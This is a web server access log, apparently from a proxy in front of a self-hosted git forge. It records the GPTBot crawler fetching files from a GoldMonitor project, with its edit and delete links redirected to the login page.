+[17/Feb/2026:17:15:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldMonitor/GoldMonitor_v3.8.spec" [Client 74.7.227.38] [Length 876] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_v3.8.spec" +[17/Feb/2026:17:15:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldMonitor/GoldMonitor_V5.3.py" [Client 74.7.227.38] [Length 872] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_V5.3.py" +[17/Feb/2026:17:15:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldMonitor/GoldMonitor_v4.8.spec" [Client 74.7.227.38] [Length 792] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_v4.8.spec" +[17/Feb/2026:17:15:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldMonitor/GoldMonitor_v3.8.spec" [Client 74.7.227.38] [Length 900] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_v3.8.spec" +[17/Feb/2026:17:15:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldMonitor/GoldMonitor_v4.9.spec" [Client 74.7.227.38] [Length 792] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_v4.9.spec" +[17/Feb/2026:17:15:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/GoldMonitor/GoldMonitor_V4.8.py" [Client 74.7.227.38] [Length 18656] [Gzip 9.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_V4.8.py" +[17/Feb/2026:17:15:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldMonitor/GoldMonitor_V5.3.py" [Client 74.7.227.38] [Length 10414] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_V5.3.py" +[17/Feb/2026:17:15:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldMonitor/GoldMonitor_V5.2.spec" [Client 74.7.227.38] [Length 876] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_V5.2.spec" +[17/Feb/2026:17:15:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldMonitor/GoldMonitor_V5.2.spec" [Client 74.7.227.38] [Length 818] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_V5.2.spec" +[17/Feb/2026:17:15:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/GoldMonitor/GoldMonitor_V5.3.py" [Client 74.7.227.38] [Length 23158] [Gzip 11.32] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_V5.3.py" +[17/Feb/2026:17:15:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldMonitor/GoldMonitor_v4.7.spec" [Client 74.7.227.38] [Length 792] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_v4.7.spec" +[17/Feb/2026:17:15:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldMonitor/GoldMonitor_V5.2.py" [Client 74.7.227.38] [Length 872] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_V5.2.py" +[17/Feb/2026:17:15:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/GoldMonitor/GoldMonitor_V5.2.py" [Client 74.7.227.38] [Length 22433] [Gzip 11.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_V5.2.py" +[17/Feb/2026:17:15:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldMonitor/GoldMonitor_V4.8.py" [Client 74.7.227.38] [Length 6379] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_V4.8.py" +[17/Feb/2026:17:15:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldMonitor/GoldMonitor_v5.1.spec" [Client 74.7.227.38] [Length 876] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_v5.1.spec" +[17/Feb/2026:17:15:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldMonitor/GoldMonitor_V4.8.py" [Client 74.7.227.38] [Length 872] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_V4.8.py" +[17/Feb/2026:17:15:16 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/GoldMonitor/GoldMonitor_V4.8.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldMonitor/GoldMonitor_V4.8.py" +[17/Feb/2026:17:15:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/GoldMonitor/GoldMonitor_V4.8.py" +[17/Feb/2026:17:15:16 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/GoldMonitor/GoldMonitor_V4.8.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldMonitor/GoldMonitor_V4.8.py" +[17/Feb/2026:17:15:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/GoldMonitor/GoldMonitor_V4.8.py" +[17/Feb/2026:17:15:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldMonitor/GoldMonitor_V5.2.py" [Client 74.7.227.38] [Length 9500] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_V5.2.py" +[17/Feb/2026:17:15:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_V5.3.spec" [Client 74.7.227.38] [Length 12600] [Gzip 3.71] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor" +[17/Feb/2026:17:15:18 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/GoldMonitor/GoldMonitor_V5.3.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldMonitor/GoldMonitor_V5.3.py" +[17/Feb/2026:17:15:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/GoldMonitor/GoldMonitor_V5.3.py" +[17/Feb/2026:17:15:19 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/GoldMonitor/GoldMonitor_V5.3.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldMonitor/GoldMonitor_V5.3.py" +[17/Feb/2026:17:15:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/GoldMonitor/GoldMonitor_V5.3.py" +[17/Feb/2026:17:15:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldMonitor/GoldMonitor_v4.8.spec" [Client 74.7.227.38] [Length 876] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_v4.8.spec" +[17/Feb/2026:17:15:20 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/GoldMonitor/GoldMonitor_V5.2.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldMonitor/GoldMonitor_V5.2.py" +[17/Feb/2026:17:15:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/GoldMonitor/GoldMonitor_V5.2.py" +[17/Feb/2026:17:15:20 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/GoldMonitor/GoldMonitor_V5.2.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldMonitor/GoldMonitor_V5.2.py" +[17/Feb/2026:17:15:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/GoldMonitor/GoldMonitor_V5.2.py" +[17/Feb/2026:17:15:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_V5.1.py" [Client 74.7.227.38] [Length 21115] [Gzip 6.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor" +[17/Feb/2026:17:15:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldMonitor/GoldMonitor_v4.7.spec" [Client 74.7.227.38] [Length 876] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_v4.7.spec" +[17/Feb/2026:17:15:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldMonitor/GoldMonitor_v4.9.spec" [Client 74.7.227.38] [Length 876] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_v4.9.spec" +[17/Feb/2026:17:15:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_v4.7.py" [Client 74.7.227.38] [Length 18804] [Gzip 5.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor" +[17/Feb/2026:17:15:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_V5.0.py" [Client 74.7.227.38] [Length 19607] [Gzip 6.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor" +[17/Feb/2026:17:15:23 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldMonitor/GoldMonitor_V5.3.spec" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_V5.3.spec" +[17/Feb/2026:17:15:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldMonitor/GoldMonitor_V5.3.spec" +[17/Feb/2026:17:15:24 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldMonitor/GoldMonitor_V5.3.spec" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_V5.3.spec" +[17/Feb/2026:17:15:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldMonitor/GoldMonitor_V5.3.spec" +[17/Feb/2026:17:15:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldMonitor/GoldMonitor_V5.3.spec" [Client 74.7.227.38] [Length 876] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_V5.3.spec" +[17/Feb/2026:17:15:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldMonitor/GoldMonitor_V5.3.spec" [Client 74.7.227.38] [Length 818] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_V5.3.spec" +[17/Feb/2026:17:15:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/-/projects?q=&sort=oldest&state=open" [Client 74.7.227.38] [Length 6798] [Gzip 2.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/-/projects" +[17/Feb/2026:17:15:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp?display=source" [Client 74.7.227.38] [Length 33694] [Gzip 10.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" +[17/Feb/2026:17:15:27 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldMonitor/GoldMonitor_V5.1.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_V5.1.py" +[17/Feb/2026:17:15:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldMonitor/GoldMonitor_V5.1.py" +[17/Feb/2026:17:15:27 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldMonitor/GoldMonitor_V5.1.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_V5.1.py" +[17/Feb/2026:17:15:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldMonitor/GoldMonitor_V5.1.py" +[17/Feb/2026:17:15:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/GoldMonitor/GoldMonitor_V5.1.py" [Client 74.7.227.38] [Length 22525] [Gzip 10.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_V5.1.py" +[17/Feb/2026:17:15:28 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldMonitor/GoldMonitor_v4.7.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_v4.7.py" +[17/Feb/2026:17:15:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldMonitor/GoldMonitor_v4.7.py" +[17/Feb/2026:17:15:29 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldMonitor/GoldMonitor_V5.0.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_V5.0.py" +[17/Feb/2026:17:15:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldMonitor/GoldMonitor_V5.0.py" +[17/Feb/2026:17:15:29 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldMonitor/GoldMonitor_V5.0.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_V5.0.py" +[17/Feb/2026:17:15:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldMonitor/GoldMonitor_V5.0.py" +[17/Feb/2026:17:15:30 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldMonitor/GoldMonitor_v4.7.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_v4.7.py" +[17/Feb/2026:17:15:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldMonitor/GoldMonitor_v4.7.py" +[17/Feb/2026:17:15:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldMonitor/GoldMonitor_v4.7.py" [Client 74.7.227.38] [Length 6692] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_v4.7.py" +[17/Feb/2026:17:15:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldMonitor/GoldMonitor_V5.1.py" [Client 74.7.227.38] [Length 872] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_V5.1.py" +[17/Feb/2026:17:15:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/GoldMonitor/GoldMonitor_v4.7.py" [Client 74.7.227.38] [Length 19346] [Gzip 9.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_v4.7.py" +[17/Feb/2026:17:15:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldMonitor/GoldMonitor_V5.0.py" [Client 74.7.227.38] [Length 8126] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_V5.0.py" +[17/Feb/2026:17:15:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldMonitor/GoldMonitor_V5.1.py" [Client 74.7.227.38] [Length 9577] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_V5.1.py" +[17/Feb/2026:17:15:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr 